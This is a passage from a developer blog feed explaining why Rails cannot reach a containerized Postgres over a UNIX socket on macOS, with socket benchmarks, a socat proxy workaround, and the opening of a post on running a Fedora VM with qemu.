number&quot;&gt;5.955&lt;/span&gt; total&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;tcp&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:8080&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-users&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;49&lt;/span&gt;.94s user &lt;span class=&quot;token number&quot;&gt;120&lt;/span&gt;.26s system &lt;span class=&quot;token number&quot;&gt;194&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;:27.39 total&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./sock.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-users&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br 
/&gt;&lt;span class=&quot;token number&quot;&gt;55&lt;/span&gt;.63s user &lt;span class=&quot;token number&quot;&gt;145&lt;/span&gt;.38s system &lt;span class=&quot;token number&quot;&gt;403&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;49.802&lt;/span&gt; total&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note that I&#39;m no expert in benchmarking, so this should not be considered especially authoritative. Still, this little &lt;code&gt;client&lt;/code&gt; executable dials out to an echo server which beams back whatever it receives. The client is set to send and receive each line of the Project Gutenberg edition of Leo Tolstoy&#39;s &lt;em&gt;War and Peace&lt;/em&gt;, because culture is important.&lt;/p&gt;
&lt;p&gt;On my machine, looping through the book ten times with a single user took almost 74% less time on the UNIX domain socket (5.96s against 22.86s over TCP), and 43% less time when ten concurrent users looped through the book ten times apiece (49.80s against 1:27.39).&lt;/p&gt;
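&lt;p&gt;For anyone who wants to check the arithmetic, the percentages come from the &lt;code&gt;total&lt;/code&gt; column of the &lt;code&gt;time&lt;/code&gt; output above. This is a small sketch using &lt;code&gt;awk&lt;/code&gt;; the &lt;code&gt;time_saved_pct&lt;/code&gt; function name is made up for this example, and 1:27.39 is written as 87.39 seconds.&lt;/p&gt;

```shell
# Hypothetical helper: percentage of wall-clock time saved when going
# from a slower run to a faster run, both given in seconds.
time_saved_pct() {
  awk -v slow="$1" -v fast="$2" 'BEGIN { printf "%.2f\n", (slow - fast) / slow * 100 }'
}

# Single user: TCP total against UNIX socket total.
time_saved_pct 22.862 5.955

# Ten concurrent users: 1:27.39 is 87.39 seconds.
time_saved_pct 87.39 49.802
```

&lt;p&gt;Note that this measures the reduction in elapsed time, which is only one of several reasonable ways to express "faster".&lt;/p&gt;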
&lt;h2 id=&quot;dock-around-the-clock&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#dock-around-the-clock&quot;&gt;Dock Around The Clock&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;So now we&#39;ve been on a journey. We know that our Rails application, by default, is configured to use UNIX sockets to connect to Postgres for local development. We&#39;re also well over 2000 words into a blog post on something that could (and, again: should) have been fixed just fine by switching to TCP with a one-line change.&lt;/p&gt;
&lt;p&gt;Now, we&#39;ll remove Postgres.app from this system and bring Docker back into the mix. We&#39;ll set up an ephemeral Postgres container:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--name&lt;/span&gt; my-cool-postgres-container &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;cool &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;:5432 &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  postgres:14&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And, from inside that container, &lt;code&gt;ls&lt;/code&gt; out the &lt;code&gt;/tmp&lt;/code&gt; directory to look for the &lt;code&gt;.s.PGSQL.5432&lt;/code&gt; file:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-it&lt;/span&gt; my-cool-postgres-container /bin/bash&lt;br /&gt;root@8759862222c5:/tmp&lt;span class=&quot;token comment&quot;&gt;# ls -al /tmp&lt;/span&gt;&lt;br /&gt;total &lt;span class=&quot;token number&quot;&gt;8&lt;/span&gt;&lt;br /&gt;drwxrwxrwt &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; root root &lt;span class=&quot;token number&quot;&gt;4096&lt;/span&gt; Jun &lt;span class=&quot;token number&quot;&gt;23&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;14&lt;/span&gt;:27 &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;br /&gt;drwxr-xr-x &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; root root &lt;span class=&quot;token number&quot;&gt;4096&lt;/span&gt; Aug &lt;span class=&quot;token number&quot;&gt;16&lt;/span&gt; 06:17 &lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Oh. It&#39;s not there. Let&#39;s &lt;code&gt;find&lt;/code&gt; it:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# 2&gt;/dev/null redirects all errors to /dev/null, which is like a black hole&lt;/span&gt;&lt;br /&gt;postgres@8759862222c5:/$ &lt;span class=&quot;token function&quot;&gt;find&lt;/span&gt; / &lt;span class=&quot;token parameter variable&quot;&gt;-name&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.s.PGSQL.5432&quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;2&lt;/span&gt;&gt;&lt;/span&gt;/dev/null&lt;br /&gt;./run/postgresql/.s.PGSQL.5432&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is, perhaps counter-intuitively, in a different place inside the container. How confusing!&lt;/p&gt;
&lt;p&gt;Running to the &lt;a href=&quot;https://www.postgresql.org/docs/14/runtime-config-connection.html&quot;&gt;Postgres documentation&lt;/a&gt; shows that the configuration value we might be interested in is called &lt;code&gt;unix_socket_directories&lt;/code&gt;, and the &lt;a href=&quot;https://www.postgresql.org/docs/current/sql-show.html&quot;&gt;&lt;code&gt;SHOW&lt;/code&gt;&lt;/a&gt; SQL command can be used to see the current setting.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-it&lt;/span&gt; my-cool-postgres-container psql &lt;span class=&quot;token parameter variable&quot;&gt;-U&lt;/span&gt; postgres &lt;span class=&quot;token parameter variable&quot;&gt;-c&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;SHOW unix_socket_directories&quot;&lt;/span&gt;&lt;br /&gt; unix_socket_directories&lt;br /&gt;-------------------------&lt;br /&gt; /var/run/postgresql&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; row&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Another path! Now we&#39;re even more confused.&lt;/p&gt;
&lt;p&gt;So, we&#39;ve got the Postgres running inside the container saying it will put its UNIX sockets in &lt;code&gt;/var/run/postgresql&lt;/code&gt;, but our &lt;code&gt;find&lt;/code&gt; command spots it in &lt;code&gt;/run/postgresql&lt;/code&gt;. And outside of the container, the Postgres running on macOS pops the socket in &lt;code&gt;/tmp&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The documentation hints at what might be going on: &lt;code&gt;The default value is normally /tmp, but that can be changed at build time.&lt;/code&gt; So the Postgres.app installation on macOS is presumably popping it in the default spot.&lt;/p&gt;
&lt;p&gt;Now, let&#39;s head back inside the container. Instead of macOS, we&#39;re now running Linux. The typical convention on Linux points to &lt;code&gt;/run&lt;/code&gt; as the &lt;a href=&quot;https://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch03s15.html&quot;&gt;home for UNIX sockets&lt;/a&gt;. But Postgres also configures itself to use &lt;code&gt;/var/run&lt;/code&gt;, which (these days) has the same purpose as &lt;code&gt;/run&lt;/code&gt; but is maintained for legacy reasons. The specification mentions that &lt;code&gt;/var/run&lt;/code&gt; can be symlinked to &lt;code&gt;/run&lt;/code&gt;, so let&#39;s take a look:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;postgres@8759862222c5:/$ &lt;span class=&quot;token function&quot;&gt;ls&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-al&lt;/span&gt; /var/run&lt;br /&gt;lrwxrwxrwx &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; root root &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; Jun &lt;span class=&quot;token number&quot;&gt;22&lt;/span&gt; 00:00 /var/run -&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; /run&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, that (mostly) explains that!&lt;/p&gt;
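&lt;p&gt;If you would rather have the shell confirm that two paths land in the same directory than eyeball the &lt;code&gt;ls&lt;/code&gt; output, a sketch along these lines should work. The &lt;code&gt;resolve_dir&lt;/code&gt; and &lt;code&gt;same_dir&lt;/code&gt; functions are hypothetical helpers for this illustration; they rely only on &lt;code&gt;cd&lt;/code&gt; and &lt;code&gt;pwd -P&lt;/code&gt;, which prints the physical path with symlinks resolved.&lt;/p&gt;

```shell
# Hypothetical helper: print the physical path of a directory.
# The subshell keeps the caller's working directory untouched.
resolve_dir() {
  (cd "$1" 2>/dev/null || exit 1; pwd -P)
}

# Hypothetical helper: succeed only if both paths exist and resolve
# to the same physical directory.
same_dir() {
  local a b
  a="$(resolve_dir "$1")" || return 1
  b="$(resolve_dir "$2")" || return 1
  [ "$a" = "$b" ]
}

# Inside the container this would compare the two socket directories.
if same_dir /var/run /run; then
  echo "/var/run and /run are the same directory"
else
  echo "/var/run and /run differ (or one is missing)"
fi
```

&lt;p&gt;The result depends on the system it runs on, so no particular output is promised here.&lt;/p&gt;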
&lt;p&gt;Now, we know where the socket file exists inside the container - so we can use a Docker bind mount to expose it to our macOS filesystem.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;--name&lt;/span&gt; my-cool-postgres-container &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-v&lt;/span&gt; /tmp/postgresql:/run/postgresql &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;cool &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;&#92;&lt;/span&gt;&lt;br /&gt;  postgres:14&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can see the file from the macOS host system, which is pretty cool.&lt;/p&gt;
&lt;p&gt;But we still won&#39;t be able to connect to it. Womp womp.&lt;/p&gt;
&lt;h2 id=&quot;hitting-dock-bottom&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#hitting-dock-bottom&quot;&gt;Hitting Dock Bottom&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We&#39;ve established a couple of really important things:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;UNIX sockets enable two separate processes to communicate via the operating system kernel&lt;/li&gt;
&lt;li&gt;Socket files provide a namespace for both processes (the server and the client) to find each other&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You may have intuitively felt this coming, but here it is: even with the file exposed from our container to our macOS host machine, a process on the host (&lt;code&gt;rake&lt;/code&gt;) and a process inside a container (&lt;code&gt;postgres&lt;/code&gt;) cannot speak to each other over a UNIX socket. We&#39;ve already mentioned that the actual &lt;em&gt;file&lt;/em&gt; isn&#39;t used to send the data and is instead managed by the kernel. And on macOS there are actually two different operating system kernels in play.&lt;/p&gt;
&lt;p&gt;Docker on macOS quietly sets up its own virtual machine. It&#39;s deftly integrated into Docker Desktop, and it&#39;s almost completely invisible to the end user - you have to really go poking for it to see a trace in your system, but each of your containers is communicating with a separate (Linux) operating system kernel, not the host system&#39;s.&lt;/p&gt;
&lt;p&gt;What happens, then, is that the Postgres installation creates a UNIX socket which it registers with the Linux kernel inside this Linux VM.&lt;/p&gt;
&lt;p&gt;You can expose the resulting &lt;code&gt;.s.PGSQL.5432&lt;/code&gt; file to the macOS kernel, but it will shrug it off as it has no recollection of that file. It doesn&#39;t mean anything to macOS - it hasn&#39;t received any of those vital system calls: as far as the macOS kernel is concerned it&#39;s just an empty file.&lt;/p&gt;
&lt;h2 id=&quot;warning%3A-everything-after-this-point-is-awful&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#warning%3A-everything-after-this-point-is-awful&quot;&gt;Warning: Everything After This Point Is Awful&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now, there &lt;em&gt;is&lt;/em&gt; an incredibly convoluted way we can get this communication up and running that will almost entirely defeat any real point of wanting to use a UNIX socket between a macOS host and a container. So, obviously, let&#39;s do it. But, you know, &lt;em&gt;never actually do this&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;We can use &lt;code&gt;socat&lt;/code&gt;, which will let us proxy between TCP and UNIX domain sockets.&lt;/p&gt;
&lt;p&gt;We&#39;re going to create another &#39;sidecar&#39; container that will have access to the socket file that Postgres uses, and then create a TCP proxy that our macOS kernel can communicate with. Yup. That&#39;s frightfully awful, but also awesome.&lt;/p&gt;
&lt;p&gt;Let&#39;s set it up. We&#39;ll create a &lt;code&gt;Dockerfile&lt;/code&gt;, which installs &lt;code&gt;socat&lt;/code&gt; and copies a bash script into an Alpine container. And then we&#39;ll make a &lt;code&gt;compose.yml&lt;/code&gt; file to let &lt;code&gt;docker compose&lt;/code&gt; do the heavy lifting. I won&#39;t go through the code line-by-line here, but you can dig into the associated GitHub repo if you&#39;d like to see it in action or give it a whirl on your machine.&lt;/p&gt;
&lt;p&gt;Our &lt;code&gt;compose.yml&lt;/code&gt; will have two services, &lt;code&gt;db&lt;/code&gt; and &lt;code&gt;proxy&lt;/code&gt;. They&#39;ll share a volume so that the &lt;code&gt;proxy&lt;/code&gt; service can interact with the UNIX domain socket that &lt;code&gt;db&lt;/code&gt; sets up, and as they&#39;re both &lt;em&gt;inside&lt;/em&gt; Docker they&#39;ll be within the virtual machine and therefore can chat to the same Linux kernel. The &lt;code&gt;proxy&lt;/code&gt; service will then forward the UNIX socket to a TCP port (&lt;code&gt;5433&lt;/code&gt;) which we&#39;ll expose to the macOS host.&lt;/p&gt;
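&lt;p&gt;As a rough idea of what the script inside the &lt;code&gt;proxy&lt;/code&gt; container could look like, here is a sketch. It is not the script from the repository: the &lt;code&gt;SOCKET_PATH&lt;/code&gt; and &lt;code&gt;LISTEN_PORT&lt;/code&gt; variables, their defaults and both function names are assumptions, and it presumes the shared volume is mounted at &lt;code&gt;/run/postgresql&lt;/code&gt; in the sidecar. The &lt;code&gt;TCP-LISTEN&lt;/code&gt; and &lt;code&gt;UNIX-CONNECT&lt;/code&gt; address types are standard &lt;code&gt;socat&lt;/code&gt; ones.&lt;/p&gt;

```shell
# Assumed defaults; neither variable comes from the original repository.
SOCKET_PATH="${SOCKET_PATH:-/run/postgresql/.s.PGSQL.5432}"
LISTEN_PORT="${LISTEN_PORT:-5433}"

# Print the two socat addresses: a forking TCP listener on the exposed
# port, and the UNIX domain socket that each connection is forwarded to.
proxy_addresses() {
  printf 'TCP-LISTEN:%s,fork,reuseaddr UNIX-CONNECT:%s\n' "$LISTEN_PORT" "$SOCKET_PATH"
}

# Wait for Postgres to create its socket in the shared volume, then
# replace this shell with socat.
run_proxy() {
  until [ -S "$SOCKET_PATH" ]; do
    sleep 1
  done
  # The substitution is left unquoted on purpose so that it splits into
  # the two address arguments socat expects.
  exec socat $(proxy_addresses)
}
```

&lt;p&gt;Calling &lt;code&gt;run_proxy&lt;/code&gt; at the end of the script would start the proxy; it is left out here so the snippet can be sourced without side effects.&lt;/p&gt;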
&lt;p&gt;Now, on the macOS host machine we need to create another &lt;code&gt;socat&lt;/code&gt; connection which listens for connections to the UNIX socket at &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; and then proxies them over to the port we&#39;re sharing with our &lt;code&gt;proxy&lt;/code&gt; container:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ socat &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; UNIX-LISTEN:/tmp/.s.PGSQL.5432,unlink-early,fork TCP:localhost:5433&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But doesn&#39;t all this extra weight, going through TCP and back out again, ultimately give us extra overhead, make it less performant, and make all of this a largely pointless exercise? Oh, definitely!&lt;/p&gt;
&lt;p&gt;... but just &lt;em&gt;how&lt;/em&gt; much more pointless, though?&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/server.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;.20s user &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;.75s system &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;:25.29 total&lt;/code&gt;&lt;/pre&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; build/client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/server.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;11&lt;/span&gt;.05s user &lt;span class=&quot;token number&quot;&gt;15&lt;/span&gt;.93s system &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;13&lt;/span&gt;:23.49 total&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Wow. We&#39;ve gone from 0:49 to 13:23.49, a ~1500% increase.&lt;/p&gt;
&lt;p&gt;Note that having to communicate through the Docker networking (and, by extension, the HyperKit VM) adds some overhead even &lt;em&gt;without&lt;/em&gt; the socket proxying.&lt;/p&gt;
&lt;p&gt;This is by no means a performant solution, then, but it was extremely fun to poke around the system, realise how deeply intertwined the operating system is with networking and to ultimately try and tease Docker into a non-standard configuration.&lt;/p&gt;
&lt;p&gt;And, even better, if we go back to that original problem...&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ bundle &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; rake db:setup&lt;br /&gt;Created database &lt;span class=&quot;token string&quot;&gt;&#39;backend_development&#39;&lt;/span&gt;&lt;br /&gt;Created database &lt;span class=&quot;token string&quot;&gt;&#39;backend_test&#39;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token builtin class-name&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;$?&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Amazing! But I think just this one time I&#39;ll &lt;a href=&quot;https://rubyonrails.org/doctrine&quot;&gt;abandon the Rails doctrine&lt;/a&gt; and go with the one-line configuration over convention. Also: Rails is pretty cool! When I finally stopped going down this silly rabbit hole I had a really fun time using it for the aforementioned work project.&lt;/p&gt;
</content>
  </entry>
  <entry>
    <title>Boot an ephemeral Linux VM in macOS with qemu</title>
    <link href="https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/"/>
    <updated>2023-07-05T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/</id>
    <content xml:lang="en" type="html">&lt;p&gt;I work on macOS, but sometimes it&#39;s very helpful to tinker with a full-fat Linux environment. Booting up a whole virtual machine is going to be more heavyweight than running something like &lt;code&gt;docker run --rm -it fedora&lt;/code&gt;, but as I host most of my personal projects on a &lt;a href=&quot;https://boringtechnology.club/&quot;&gt;boring&lt;/a&gt; server it can be useful to have a quick(ish) feedback loop for testing things like &lt;code&gt;systemd&lt;/code&gt; and &lt;code&gt;cron&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Many Linux distributions provide cloud images, which are generally comparable to their server versions but designed to boot without a manual install process. These types of images pair really well with &lt;a href=&quot;https://www.qemu.org/&quot;&gt;qemu&lt;/a&gt;, an open-source system emulator that can use hardware virtualisation (macOS has the &lt;a href=&quot;https://developer.apple.com/documentation/hypervisor&quot;&gt;Hypervisor framework&lt;/a&gt;) to run disposable guest operating systems.&lt;/p&gt;
&lt;p&gt;Let&#39;s make sure we have everything we need:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ brew install qemu curl gnupg xorriso
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can then grab the current cloud image for &lt;a href=&quot;https://fedoraproject.org/cloud/&quot;&gt;Fedora&lt;/a&gt;, but you can replace this with basically any distro you want:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# I&#39;m an old man using an x86 machine, amend to aarch64 if you&#39;re fancy&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; https://download.fedoraproject.org/pub/fedora/linux/releases/38/Cloud/x86_64/images/Fedora-Cloud-Base-38-1.6.x86_64.qcow2&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; https://download.fedoraproject.org/pub/fedora/linux/releases/38/Cloud/x86_64/images/Fedora-Cloud-38-1.6-x86_64-CHECKSUM&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; https://fedoraproject.org/fedora.gpg&lt;br /&gt;$ gpgv &lt;span class=&quot;token parameter variable&quot;&gt;--keyring&lt;/span&gt; ./fedora.gpg Fedora-Cloud-38-1.6-x86_64-CHECKSUM&lt;br /&gt;$ sha256sum &lt;span class=&quot;token parameter variable&quot;&gt;-c&lt;/span&gt; Fedora-Cloud-38-1.6-x86_64-CHECKSUM&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then run our shiny new &lt;code&gt;Fedora-Cloud-Base-38-1.6.x86_64.qcow2&lt;/code&gt; using &lt;code&gt;qemu&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-system-x86_64 &#92;
	-accel hvf &#92;
	-cpu host &#92;
	-m 1G &#92;
	-drive if=virtio,file=Fedora-Cloud-Base-38-1.6.x86_64.qcow2 &#92;
	-nic user,model=virtio-net-pci,hostfwd=tcp:127.0.0.1:2222-:22 &#92;
	-snapshot &#92;
	-nographic
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Woah. That&#39;s a lot. What&#39;s going on here?&lt;/p&gt;
&lt;p&gt;Your applications, for the most part, want to spend their time communicating with all the fabulous hardware you have in your computer - CPU, memory, network card, GPU, storage, etc.  However, for many eminently sensible reasons, your software isn&#39;t allowed to speak directly to this hardware, and instead sends and receives a bunch of system calls through an operating system acting as a happy intermediary.&lt;/p&gt;
&lt;p&gt;Virtualisation adds another layer of indirection to all this, allowing you to run &#39;guest&#39; operating systems which &lt;em&gt;think&lt;/em&gt; they&#39;re talking directly with computer hardware but are instead talking to &lt;em&gt;another&lt;/em&gt; operating system, known as the host. Many CPUs feature technology to allow this to all happen with maximum performance and minimum overhead, and contemporary machines can offer performance &lt;em&gt;almost&lt;/em&gt; as good on many virtualisation workloads as running a single operating system communicating straight with the hardware.&lt;/p&gt;
&lt;p&gt;The magic software that makes this work is called a hypervisor, and historically there&#39;s been chat about hypervisors that operate &lt;em&gt;in place&lt;/em&gt; of a main operating system (known as Type 1) and hypervisors that operate &lt;em&gt;on top&lt;/em&gt; of an existing operating system (or Type 2). We won&#39;t go into that here - instead, we&#39;ll just enjoy a broad, top-level visualisation of how a guest operating system loosely functions:&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/hypervisor.svg&quot; alt=&quot;A hypervisor sits between a guest operating system and the host operating system&quot; /&gt;
